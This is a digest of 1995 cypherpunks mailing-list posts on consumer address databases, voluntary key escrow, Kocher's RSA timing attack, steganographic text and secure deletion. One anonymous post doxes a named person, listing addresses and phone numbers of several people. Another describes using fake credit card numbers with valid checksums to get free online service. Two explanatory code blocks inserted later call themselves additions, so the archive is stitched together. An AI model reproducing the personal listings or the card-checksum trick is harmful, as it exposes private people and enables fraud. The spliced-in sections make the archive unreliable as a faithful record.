From: "Ed Carp (ecarp@netcom.com)" <ecarp@netcom.com>
Date: Fri, 15 Dec 1995 12:56:25 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512150028.SAA30583@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Thu, 14 Dec 1995 13:06:50 -0800
> To:            cypherpunks@toad.com
> From:          Bill Stewart <stewarts@ix.netcom.com>
> Subject:       Re: ADDRESS DATABASE? 

> At 01:32 PM 12/14/95 -0600, you wrote:
> >sandfort@crl.com said:
> >> Something of privacy interest happened to me yesterday.  I phoned a 
> >> company to ask for a copy of their catalog.  The phone clerk asked 
> >> for my last name and zip code.  After receiving that info, the clerk 
> >> asked me, "Is this your full name and address?" and then gave them 
> >> both correctly.  I was taken aback.
> >
> > Taken aback?  It's only going to get worse in the future.  As Telcos, credit
> >card companies, etc., start looking for new ways to make money I think 
> >selling information about you will increase dramatically.
> 
> I'm in the process of moving and getting new phones, and Pac Bell asked me
> if it was ok to send my Social Security Number to my long-distance carrier.
> I told them "no, but you don't have my SSN anyway" "Oh, you're right, we don't;
> can we have it" "No" "OK.  Would you be willing to give us your driver's license
> number or another form of ID?  We've just started asking for this recently." 
> "Is it required?" "No, it's optional, but I have to ask" "No, thanks"

You know why they want that, don't you?  So if you don't pay your 
bill, they can ding your credit report.  PG&E will do the same thing 
to you, and they will both do it illegally, without notifying you 
first as they are required to do by law.  So, I'd advise you to check 
your credit report regularly for signs of abuse.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 15 Dec 1995 13:50:04 +0800
To: cypherpunks@toad.com
Subject: Re: And the standard continues to lower...
Message-ID: <2.2b7.32.19951215013346.008d4434@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:17 PM 12/13/95 -0600, you wrote:
>Dr. Brian L. Crissey includes in his .sig, courtesy of cactus@hks.net
>[ much WRT YetAnotherSecureInternetCreditCardPaymentSystem(*tm) deleted ]
>> ***Dr. Brian L. Crissey, Chair CS Dpt, Linfield Col., McMinnville, OR 97128
>> (503)-434-2426 brianc@linfield.edu
>> Professionals built the Titanic, amateurs built the Ark...
>
>However, the Ark was *designed* by GOD (if you believe the story).  Can Dr.  
>Brian L. Crissey say the same thing about his payment system?

He seems to think so...  He is so assured as to the security of his system.
I am going to ask if I can post his challenge he made to me in private
e-mail here.  He needs to be taught some basics in security.  (I do not have
the proper hardware to subvert his scheme.  I do have some other ways of
subverting it, but that would be telling...  (I occasionally assist with the
web server on Teleport.  Changing his script to collect information would
not be difficult...))

I will see if he will let me forward his e-mail to the list.  (I will also
check with the webmistress on Teleport before I do...  She might get pissed
if I turned the people on the list onto Teleport's server.)

|       What is the Eye in the Food Pyramid?      | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Charles Graves <llurch@networking.stanford.edu>
Date: Fri, 15 Dec 1995 13:53:24 +0800
To: cypherpunks@toad.com
Subject: Another One-Time Pad Reference
Message-ID: <199512150151.RAA09562@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


http://www.atria.com/~dawson/tbtf/archive/0044.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolann@censored.org>
Date: Fri, 15 Dec 1995 09:07:05 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512150002.RAA23168@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Thu, 14 Dec 1995, Sandy Sandfort wrote:

>> Yeah, maybe, but my original question was, "does anyone KNOW how 
>> the trick was done?                                     ^^^^

Sandy,

The phone companies sold the information as soon as you moved. 
^^^ ^^^^^ ^^^^^^^^^^ ^^^^ ^^^^ ^^^^^^^^^^^ ^^ ^^^^ ^^ ^^^ ^^^^^^
It's called the Blue Book, any library has one for your
area. Welcome Wagons and the like buy them.

You can buy lists by address, sequential phone #'s, types of
services people order, etc. 

A recent real-life example is this:

I ordered caller-id on my phone in Nov. I already have had
three direct mailings for security devices. It is assumed by
being a girl, and ordering caller ID I am in fear.

--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 15 Dec 1995 02:57:26 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512141740.SAA13977@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Sandy Sandfort 7:51 AM 12/14/95 (not completely in this order):

>Something of privacy interest happened to me yesterday.  I phoned
>a company to ask for a copy of their catalog.  The phone clerk
>asked for my last name and zip code.  After receiving that info,
>the clerk asked me, "Is this your full name and address?" and
>then gave them both correctly.  I was taken aback.

    That is the correct response.

>Does anyone know how this trick was done?

    What trick? For ~$150, you can buy a CD-ROM-set DB with every listed
phone number in the U.S. on it, faxes too; the info's rife with typos and 
has a lag of ~6-7 months, but what do you want? If you're willing to pay
more, you'll get more -- more accurate, more timely, more aggressively
correlated, more thorough info.

>I have been at my new address for only a couple of months.  Prior

    Where's your new address, under a rock? ;) 

>to that, I have been couch surfing for a year and a half.  Though

    Ironically, NFA status will get you on some very aggressive lists.

>I called an 800 number, ANI had nothing to do with it since I was
>calling from work.  It may have been from a database associated
>with a credit reporting agency, a bank or a utility company, but

    [x] all of the above

>I am not aware of any of these being available on-line for 

    They are.

>something as mundane as requesting a consumer catalog.  The clerk 
              ^^^^^^^

    Are you being serious? Ever heard of "information markets"? What,
are you a libertarian just because you don't like taxes? There are
other reasons for being one... :)

>had no idea where the info came from (or so he said). 


Detweiler   L           Detweiler   L S         Detweiler   Larry 
8525 E Hampden Ave      3704 S 2nd St           2884 Ww Ave
Denver  CO              Austin TX               Parnell IA
80231-4826              78704-7073              52325-8825
303-695-0497            512-448-1750            319-628-4461

Detweiler Lynn          Detweiler   Lynn        Detweiler Lynn Teenline
                        1724 N Alabama St       1045 W Forevergreen Rd
North Liberty IA        Silver City NM          North Liberty IA
52317                   88061-4302              52317-9717
319-626-6272            505-538-2776            319-626-8216
                          
<etc.>

      PS. Unless your postscript (in the classical sense) about getting
help making an adult film was a pickup line, maybe you could talk to one
of Detweiler's neighbors about it...


- -------------

      That took about 15 seconds, but I'm a fast typer. YMMV.

Hieronymous (*not* one of LD's neighbors)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMNBgWr3g0mNE55u1AQEugwH8DKWGsVXd9tfK97RICTeddGJUuQFFwrP3
WoQXrrxNcvGRQ8bzZ3ANH1FPAAiCt7WB+8OF3MA20H/Ma1XuiU8ljw==
=QTb4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Fri, 15 Dec 1995 09:01:08 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <9512142357.AA29905@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


  The best way to circumvent something like the below occurring is to have
your home phone number listed under a pseudonym with no street address listed -
and block out *69 and caller-id.  If some entity wants your phone number,
give them your business number.

>>Something of privacy interest happened to me yesterday.  I phoned
>>a company to ask for a copy of their catalog.  The phone clerk
>>asked for my last name and zip code.  After receiving that info,
>>the clerk asked me, "Is this your full name and address?" and
>>then gave them both correctly.  I was taken aback.
>>Does anyone know how this trick was done?
>
>    What trick? For ~$150, you can buy a CD-ROM-set DB with every listed
>>phone number in the U.S. on it, faxes too;
>


*******************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison@mhv.net         |      - Go to bed."
*******************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Fri, 15 Dec 1995 04:20:43 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: Netscape announces position against GAK
Message-ID: <199512141900.UAA16686@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


On 14 Dec 1995 08:20:46, amp <Alan.Pugh@internetMCI.COM> writes (in part):

>i'm not entirely satisfied with netscape's response, but then, i
>didn't expect to be. i _expect_ weaseling from corporations that have
>made the 'big time'. this is the way life is i suppose. what i'd like
>to see would be more companies that have an interest in the security
--snip--
>amp
><0003701548@mcimail.com> (since 10/31/88)
><alan.pugh@internetmci.com>
>Current PGP Key = 57957C9D
>December 13, 1995   18:51

i cannot fault you too much for not using capitals, since it is a well known
fact that network mci charges extra for their use.  however, i do believe
that your posts might be taken more seriously were they easier to read.
maybe it is time to shell out the extra $$ and buy some capital letters.

        hooker







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jonathan M. Bresler" <jmb@FreeBSD.ORG>
Date: Fri, 15 Dec 1995 10:13:47 +0800
To: Sten Drescher <dreschs@austnsc.tandem.com>
Subject: Re: kocher's timing attack
In-Reply-To: <55loofy5qn.fsf@galil.austnsc.tandem.com>
Message-ID: <Pine.BSF.3.91.951214200818.22735C-100000@Aspen.Woc.Atinc.COM>
MIME-Version: 1.0
Content-Type: text/plain


On 14 Dec 1995, Sten Drescher wrote:

> On Firewalls, "Jonathan M. Bresler" <jmb@FreeBSD.ORG> said:
> 
> JMB> regarding kocher's timing attack paper:
> 
> JMB> RSA attack.  only known ciphertext is needed.  don't know how many
> JMB> known ciphertexts are required (related to key size surely).  the
> JMB> paper's example is digital signature, rephrase that to Alice signs
> JMB> Bob's public key certifying that (you know the story).  After
> JMB> several large key signing parties hundreds of known ciphertexts
> JMB> could have been generated using Alice's key--each one a public key
> JMB> of someone else.  over several years it piles up.  the known
> JMB> ciphertexts can be tested/analyzed to yield Alice's secret key.
> JMB> ouch.  ;/
> 
> 	Are you sure about this?  It would seem that the same principle
> would then apply to signed messages as well, and I find it a bit hard to
> believe that signing messages would make ones key pair vulnerable.

	no, i am not sure.  but after reading the paper carefully that is 
what i conclude.  on page 4 start of the 4th paragraph "The Chinese 
Remainder Theorem RSA attack can also be adapted to use only known 
ciphertext, and thus can be used to attack RSA digital signatures."

	the key here is "known ciphertext": you have both the message and 
its encrypted version.  When Alice signs Bob's public key, with her 
private key of course, she is encrypting Bob's public key.  this allows 
Charlie to use Alice's public key to decrypt the signature, recovering a 
message that is identical to Bob's public key.  that's the proof that 
Alice was the signer.

	no, i am not sure.   anyone see holes in this?


Jonathan M. Bresler        FreeBSD Postmaster         jmb@FreeBSD.ORG
play go. ride bike. hack FreeBSD.--ah the good life 
i am moving to a new job.                 PLEASE USE: jmb@FreeBSD.ORG





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 15 Dec 1995 17:35:52 +0800
To: cypherpunks@toad.com
Subject: "Strongly Voluntary" Key Escrow
Message-ID: <acf62a67000210041e61@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:18 PM 12/14/95, jim bell wrote:

>I disagree.  The issue is one that might be called "standing."  Who,
>exactly, is responsible to whom in such an arrangement.  Let's suppose key
>escrow (for keys for non-exported encryption devices) is REALLY VOLUNTARY.
>In that case, the escrow agent's only legal  responsibility is to the owner
>of the encryption device.  The government isn't a party to this voluntary
>arrangement, and thus hasn't a complaint if the escrow agent refuses to comply.
>
>I could, for example, enter into a voluntary arrangement with an escrow
>agent so that he would be obligated to erase the key no more nor less than 5
>days after he received it.  If he  did so 1 day after, and I needed the key,
>he would have breached his obligation to ME, but not to the government.
>Likewise, if he failed to erase the key, he would likewise be breaching his
>agreement with me.

I agree with this analysis. When key escrow was being debated in the summer
of '94 here, I called this criterion the basis for a "strongly voluntary"
system. Specifically, that one could have the bit bucket as an "escrow
agent," with of course no retrieval by the government. Or one's lawyer, or
one's spouse, or an offshore bank, and so on.

All of these are "voluntary" key escrow (though I hate that misuse of the
word "escrow") systems. None of them involve government certification, and
there are few circumstances where I think "government certification" is
even useful, let alone necessary.

Any scheme in which the government interjects itself in what would not
normally involve them can hardly be said to be strictly voluntary.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 15 Dec 1995 13:49:46 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: NIST GAK meeting writeup, LONG part 3 of 3
In-Reply-To: <m0tQMvq-00090LC@pacifier.com>
Message-ID: <199512150148.UAA00854@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


jim bell writes:
> It _is_ less voluntary, because it interferes with my right to escrow my key
> with an organization that is willing to take the dispute to arbitrary levels
> of uncooperativeness with the government.  I might insist, for example, that
> the organization only store the key outside the country (beyond the reach of
> US Courts) and require MY PERMISSION for them to release it to the
> government.  I might also insist that they further encode the key so that
> only an independent foreign organization (out of reach of US courts) could
> provide the key to decrypt it.
> 
> If key escrow is REALLY REALLY REALLY "voluntary", then such arbitrary
> restrictions should be do-able.

Unless I've missed something large, you can have an _uncertified_ key escrow 
agent store your keys in Fidel Castro's beard, and only release them with
written permission from your goldfish. 

Whether or not you use a certified key escrow agency would remain your 
choice, AFAIK.

I'm not expressing support for the certification standards that have been
presented. But I don't consider it cause for great alarm that the USG wants
to play in the escrow agent rating bureau business.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 15 Dec 1995 11:35:22 +0800
To: cypherpunks@toad.com
Subject: Re: e-mail forwarding, for-pay remailers
In-Reply-To: <Pine.ULT.3.91.951214104824.5962B-100000@Networking.Stanford.EDU>
Message-ID: <B9N5FD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves <llurch@networking.stanford.edu> writes:
> AOL will, however, accept a bogus name, address, and credit card number
> (as long as the checksum is correct) for the initial ten free hours plus
> however long it takes for the first bill to bounce.
>
> America "On Line" will also accept direct debits from an untraceable bank
> account (for this they charge a little extra).

This used to be the case.  However they've fixed this, and won't let you
use your 10 free hours until they have a valid number.

I've been told that Compuserve still accepts any credit card number as long
as the checksum is valid.  I haven't tried it. (Note that as long as you're
only using the "free hours", you're not stealing any services.)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 16 Dec 1995 07:46:44 +0800
To: cypherpunks@toad.com
Subject: Re: Pornographic stories
In-Reply-To: <199512130602.WAA02645@netcom9.netcom.com>
Message-ID: <Dgo5FD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jadestar@netcom.com (JaDe) writes:
> >
> > Daniel Miskell <DMiskell@envirolink.org> writes:
> >>>I'm sure.
>
> > I too fail to see the cryptorelevance of this thread... Unless
> > alt.sex.stories is used for steganography... Alice wants to send a
> > secret message to Bob, so she posts a porn story to alt.sex.stories,
> > where the key phrase is "That was the best sex I've ever had", which
> > sounds like a mild hyperbole to most people;
>
> 	I like the steganography angle.  However I'd encode the
> 	actual message contents into the typos.  Filter out the
> 	typos to retrieve your crypto-text.

Wouldn't text with a lot of typos look suspicious? For ultimate silliness,
I've put together the following program to encode 8 bits at a time in an
R-rated sentence:

#include <stdio.h>

/* Bit n of c (0 = least significant). */
#define BIT(c,n) (((c)>>(n))&1)

/* Eight pairs of phrases; each pair supplies the text for one bit. */
const char *bits[]={
"Senator Exon",                         "L.Ron Hubbard",
"made passionate love to",              "had great sex with",
"Hillary Klinton",                      "J.D.Falk",
"experienced",                          "gave her",
"six",                                  "twelve",
"in",                                   "during",
"one",                                  "a single",
"night",                                "weekend"};

/* Print one sentence encoding the 8 bits of c, most significant bit first. */
void stegaporn(int c)
{
    printf("%s %s %s and %s %s orgasms %s %s %s.  ",
           bits[BIT(c,7)], bits[2+BIT(c,6)], bits[4+BIT(c,5)], bits[6+BIT(c,4)],
           bits[8+BIT(c,3)], bits[10+BIT(c,2)], bits[12+BIT(c,1)], bits[14+BIT(c,0)]);
}

/* Encode standard input, one sentence per input byte. */
int main(void)
{
    int c;

    while (EOF!=(c=getchar()))
        stegaporn(c);

    return 0;
}

> 	Ultimately I think that the whole issue of legal cryptography
> 	actually boils down to this:
>
> 		If you illegalize strong crypto then criminals will
> 		simply resort to steganography and "hidden" channels
> 		of communication (in which they can also embed/tunnel
> 		the crypto-text of their strongly encrypted data).
>
> 		Therefore all you've done is create a lesser crime
> 		for the real criminals and make people with valid
> 		(non-criminal) uses of the technology into criminals.
>
> 	Unfortunately this reasoning doesn't help at all with our
> 	(U.S.) legislature.  There is some hidden agenda as to
> 	why "they" really want strong cryptography to be difficult
> 	for the average user to obtain.  I have a uniquely hard time
> 	believing that "they" are merely concerned that "we" might
> 	be pursuing simple privacy (even if cryptography were already
> 	illegal I could use it for years and never get "caught."
> 	so long as I was using non-broadcast channels and communicating
> 	with "trusted" associates (fellow "crypto-criminals")
>
> 	In fact I've suggested to several people that we start
> 	a dial-up uucp revival for this and related reasons.  (If
> 	the number of users/webpages and the bandwidth usage continues
> 	to increase at the recent rates -- without a corresponding
> 	improvement in the infrastructure we'll probably all want to
> 	go back to uucp for mail and news anyway.  Old fashioned dial-up
> 	may be faster than T1 access in a few years and direct point-to-
> 	point uucp over ISDN is probably faster already.
>
> 	So:
>
> 		What is the "real" reason for opposition to 	
> 		 strong crypto?  Who "really" benefits?  (and please
> 		 don't mention the LE types 'cause I don't believe it).
>
> 	and:
> 		Anyone else want to participate in the great '90's
> 		uucp revival?  I'm in Santa Clara and could use
> 		some feeds and some help with the setup.

I'm all for it. My site is connected to the rest of the world via dial-up
UUCP, I haven't touched the setup in 5 years, and am not planning to.

It might be interesting to have a variation of dial-up UUCP where site 1
passes encrypted stuff to site 2 and doesn't quite know what site 3 they're
supposed to go on to. Sort of like the remailers with encryption.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
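
The receiving side of the scheme in the post above, as an added example that is not part of the original message: each sentence has eight slots with two possible fillers, so a decoder reads one bit per slot, and any text that does not fit the single fixed template is rejected, which is also why such cover text is easy to fingerprint. The neutral word table, the "files" connective, the function names and the sample sentences are constructed for this example; only the slot layout (bit 7 first, one sentence per byte) follows the posted program.

```c
#include <stdio.h>
#include <string.h>

/* Constructed, neutral word table: slot i carries bit (7 - i) of the byte. */
static const char *const slot[8][2] = {
    {"Alice", "Bob"},
    {"sent mail to", "had lunch with"},
    {"Carol", "Dave"},
    {"copied", "returned"},
    {"six", "twelve"},
    {"in", "during"},
    {"one", "a single"},
    {"night", "weekend"},
};

/* Fixed text that follows each slot; it carries no data. */
static const char *const glue[8] = {
    " ", " ", " and ", " ", " files ", " ", " ", "."
};

/* Encode one byte as one sentence.
   Returns the number of characters written, or -1 if buf is too small. */
int encode_byte(unsigned char c, char *buf, size_t size)
{
    size_t used = 0;
    for (int i = 0; i < 8; i++) {
        int bit = (c >> (7 - i)) & 1;
        int n = snprintf(buf + used, size - used, "%s%s", slot[i][bit], glue[i]);
        if (n < 0 || (size_t)n >= size - used)
            return -1;
        used += (size_t)n;
    }
    return (int)used;
}

/* Length of word if s starts with it, otherwise 0. */
static size_t match(const char *s, const char *word)
{
    size_t n = strlen(word);
    return strncmp(s, word, n) == 0 ? n : 0;
}

/* Decode the sentence at *pp. On success returns the byte (0..255) and
   advances *pp past the sentence; returns -1 if the text does not fit
   the template. */
int decode_sentence(const char **pp)
{
    const char *s = *pp;
    int byte = 0;
    for (int i = 0; i < 8; i++) {
        size_t n0 = match(s, slot[i][0]);
        size_t n1 = match(s, slot[i][1]);
        size_t g;
        int bit;
        if (n0 && !n1)
            bit = 0;
        else if (n1 && !n0)
            bit = 1;
        else
            return -1;              /* neither filler, or ambiguous */
        s += bit ? n1 : n0;
        g = match(s, glue[i]);
        if (!g)
            return -1;              /* connective text is missing */
        s += g;
        byte = (byte << 1) | bit;
    }
    *pp = s;
    return byte;
}

/* Decode a run of sentences separated by spaces or newlines.
   Returns the number of bytes recovered, or -1 if any sentence does not
   fit the template or out is too small. */
int decode_text(const char *text, unsigned char *out, size_t outsize)
{
    size_t count = 0;
    while (*text == ' ' || *text == '\n')
        text++;
    while (*text) {
        int b = decode_sentence(&text);
        if (b < 0 || count >= outsize)
            return -1;
        out[count++] = (unsigned char)b;
        while (*text == ' ' || *text == '\n')
            text++;
    }
    return (int)count;
}

int main(void)
{
    char sentence[128];
    unsigned char out[1];
    if (encode_byte('H', sentence, sizeof sentence) < 0)
        return 1;
    printf("%s\n", sentence);
    if (decode_text(sentence, out, sizeof out) != 1)
        return 1;
    printf("decoded: %c\n", out[0]);
    return 0;
}
```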




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 15 Dec 1995 11:01:57 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: kocher's timing attack
In-Reply-To: <Pine.BSF.3.91.951214200818.22735C-100000@Aspen.Woc.Atinc.COM>
Message-ID: <199512150203.VAA00869@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jonathan M. Bresler writes:
[...on firewalls...]
> regarding kocher's timing attack paper:
>
> RSA attack.  only known ciphertext is needed.  don't know how many
> known ciphertexts are required (related to key size surely).  the
> paper's example is digital signature, rephrase that to Alice signs
> Bob's public key certifying that (you know the story).  After
> several large key signing parties hundreds of known ciphertexts
> could have been generated using Alice's key--each one a public key
> of someone else.  over several years it piles up.  the known
> ciphertexts can be tested/analyzed to yield Alice's secret key.

[...later on cypherpunks...]

> no, i am not sure.  but after reading the paper carefully that is 
> what i conclude.  on page 4 start of the 4th paragraph "The Chinese 
> Remainder Theorem RSA attack can also be adapted to use only known 
> ciphertext, and thus can be used to attack RSA digital signatures."
> 
> 	the key here is "known ciphertext": you have both the message and 
> its encrypted version.  When Alice signs Bob's public key, with her 
> private key of course, she is encrypting Bob's public key.  this allows 
> Charlie to use Alice's public key to decrypt the signature, recovering a 
> message that is identical to Bob's public key.  that's the proof that 
> Alice was the signer.
> 
> 	no, i am not sure.   anyone see holes in this?

You are overlooking the main point that this is a _timing_ attack. Unless
Bob gets to time Alice carefully when she signs his public key (or a message),
there is no basis for the attack. For certificate servers this may well be
an issue, but most individuals don't sign things online. Just beware of
people with extremely precise stopwatches at key signing parties ;>

-Futplex <futplex@pseudonym.com>
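
Why the stopwatch matters, as an added example that is not from Kocher's paper or from any post in this thread: a textbook square-and-multiply exponentiation does one extra multiplication for every 1 bit of the secret exponent, while a ladder that always performs the same two multiplications does identical work for every exponent. The toy modulus 3233, the exponents and the multiplication counter standing in for a stopwatch are assumptions of the example; real code also needs the multiplication itself to run in constant time.

```c
#include <stdint.h>
#include <stdio.h>

/* Counter standing in for a stopwatch: each modular multiplication costs
   one "tick". Constructed for this example. */
static unsigned long mul_ticks;

/* n must be below 2^32 so the product fits in 64 bits. */
static uint64_t mulmod(uint64_t a, uint64_t b, uint64_t n)
{
    mul_ticks++;
    return (a % n) * (b % n) % n;
}

/* Textbook left-to-right square-and-multiply: the multiply step runs only
   for 1 bits, so the tick count is 32 + (number of 1 bits in exp). */
uint64_t modexp_leaky(uint64_t base, uint32_t exp, uint64_t n)
{
    uint64_t r = 1 % n;
    for (int i = 31; i >= 0; i--) {
        r = mulmod(r, r, n);
        if ((exp >> i) & 1)
            r = mulmod(r, base, n);
    }
    return r;
}

/* Montgomery ladder: one multiply and one square per bit, whatever the
   bit is, with the bit selecting operands through a masked swap instead
   of a branch. The tick count is always 64. */
uint64_t modexp_ladder(uint64_t base, uint32_t exp, uint64_t n)
{
    uint64_t r0 = 1 % n, r1 = base % n;
    for (int i = 31; i >= 0; i--) {
        uint64_t mask = (uint64_t)0 - ((exp >> i) & 1);  /* all ones if bit set */
        uint64_t t = (r0 ^ r1) & mask;
        r0 ^= t; r1 ^= t;              /* swap when the bit is 1 */
        r1 = mulmod(r0, r1, n);
        r0 = mulmod(r0, r0, n);
        t = (r0 ^ r1) & mask;
        r0 ^= t; r1 ^= t;              /* swap back */
    }
    return r0;
}

/* Ticks spent on one exponentiation by each routine. */
unsigned long ticks_leaky(uint64_t base, uint32_t exp, uint64_t n)
{
    mul_ticks = 0;
    (void)modexp_leaky(base, exp, n);
    return mul_ticks;
}

unsigned long ticks_ladder(uint64_t base, uint32_t exp, uint64_t n)
{
    mul_ticks = 0;
    (void)modexp_ladder(base, exp, n);
    return mul_ticks;
}

/* What someone timing the leaky routine learns about the exponent:
   its Hamming weight. */
unsigned weight_seen_by_timer(unsigned long ticks)
{
    return (unsigned)(ticks - 32);
}

int main(void)
{
    const uint64_t n = 3233;                        /* toy modulus 61 * 53 */
    const uint32_t exps[] = { 17, 2753, 0x0FFF };   /* constructed exponents */
    for (size_t i = 0; i < 3; i++)
        printf("exp=%lu  leaky=%lu ticks  ladder=%lu ticks\n",
               (unsigned long)exps[i],
               ticks_leaky(2790, exps[i], n),
               ticks_ladder(2790, exps[i], n));
    return 0;
}
```

Without the tick counts, the inputs and outputs of both routines are indistinguishable, which is the point made in the reply above: the signatures alone carry no timing information.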




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net
Date: Fri, 15 Dec 1995 11:33:11 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512150303.VAA10066@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


>  The best way to circumvent something like the below occurring is to have
>your home phone number listed under a pseudonym with no street address listed -
>and block out *69 and caller-id.  If some entity wants your phone number,
>give them your business number.

Another "best way" is to make all calls that you want to be personal with
a cellular phone.  Most cellular systems don't send ANI and do not provide
any type of billing information to the phone company.  The number is also by
nature unlisted and the only way to get it is by you or the cellular 
carrier.  If the cellular carrier gives your number out without your
permission or a court order they are in BIG trouble..





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 15 Dec 1995 11:01:11 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Secured RM ? (source) (bounce-fwd)
Message-ID: <199512150208.VAA00886@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> From MAILER-DAEMON Thu Dec 14 21:05:20 1995
> 
>    ----- Transcript of session follows -----
> 550 hellspawn.gate.net (tcp)... 550 Host unknown
> 554 <root@HellSpawn.gate.net>... 550 Host unknown (Authoritative answer from name server)
> 
>    ----- Unsent message follows -----
> Subject: Re: Secured RM ? (source)
> To: root@HellSpawn.gate.net (root)
> 
> Have you considered using "pgp -w filename" ?  It doesn't take wildcards,
> but that's arguably a feature :)

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 16 Dec 1995 13:21:00 +0800
To: root@HellSpawn.gate.net (root)
Subject: Re: Secured RM ? (source)
In-Reply-To: <Pine.LNX.3.91.800121064335.1068A-100000@HellSpawn.gate.net>
Message-ID: <199512150218.VAA14539@homeport.org>
MIME-Version: 1.0
Content-Type: text


| 
| While we're here..  I haven't been able to find anyone on the planet who's 
| seen or heard of a linux un-remove, which makes testing my code very 
| tricky.  If anyone can point me at it I'd appreciate it. Hell, if someone 
| can definitively say they've /seen/ such a thing it'd be nice. So far 
| i've found one person who insists that his system admins sisters 
| boyfriends cousin from Saint Petersburg has been using un-rm for unix for 
| years. *sigh* 


	From comp.unix.questions FAQ:
	(http://www.cis.ohio-state.edu/hypertext/faq/usenet/unix-faq/faq/part3/faq-doc-6.html)

	MIT's Project Athena has produced a comprehensive
      delete/undelete/expunge/purge package, which can serve as a
      complete replacement for rm which allows file recovery.  This
      package was posted to comp.sources.misc (volume 17, issue
      023-026)


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@artcom.de>
Date: Fri, 15 Dec 1995 06:06:32 +0800
To: hoz@univel.telescan.com
